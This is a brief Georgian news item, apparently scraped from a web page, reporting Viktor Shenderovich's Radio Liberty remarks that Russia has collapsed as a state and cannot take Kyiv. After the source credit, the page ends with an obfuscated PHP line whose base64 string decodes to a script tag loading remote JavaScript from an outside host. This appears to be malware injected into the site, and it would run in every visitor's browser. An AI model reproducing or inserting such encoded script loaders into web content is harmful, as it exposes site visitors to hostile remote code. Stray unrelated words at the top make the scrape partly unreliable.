celsiusi
ავერსი შნაიდერი
რუსი მწერალი, ვიქტორ შენდეროვიჩი ამბობს, რომ რუსეთი არ არსებობს, როგორც ქვეყანა, არ არსებობს რუსეთის სახელმწიფო. ამის შესახებ მან რადიო თავისუფლებასთან ინტერვიუში განაცხადა. 
 
მისივე თქმით, ის, რასაც ვხედავთ, რუსეთის სახით, არის აგონიაში ჩავარდნილი დრაკონი, რომელიც ტორებსა და კუდს სცემს ყველაფერს.
 
" ცხადია, რუსეთი არასოდეს დაიკავებს უკრაინის ქალაქებს, მას შეუძლია ისინი მტვრად აქციოს, ეს კი. არ ვიცი, რამდენი რაკეტა „კალიბრი“ დარჩათ, მტვრად ქცევა შეიძლება, რაღაც რაოდენობის ხალხის მოკვლა ჯერ კიდევ შეიძლება, სისხლის დაღვრა შეიძლება, მაგრამ მიწაზე არა, არ შევლენ, კიევს არ დაიკავებენ. და რომც დაიკავონ, რას გააკეთებენ იქ? მათ ფეხქვეშ მიწა დაეწვებათ. ამიტომ ახლა, ამ ვითარებაში, როცა სავსებით გასაგები გახდა, კი, ისინი რიტორიკას ცვლიან, ვნახოთ, რას გააკეთებენ", – განაცხადა შენდეროვიჩმა.
 
წყარო: ©️ რადიო თავისუფლება
1109
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");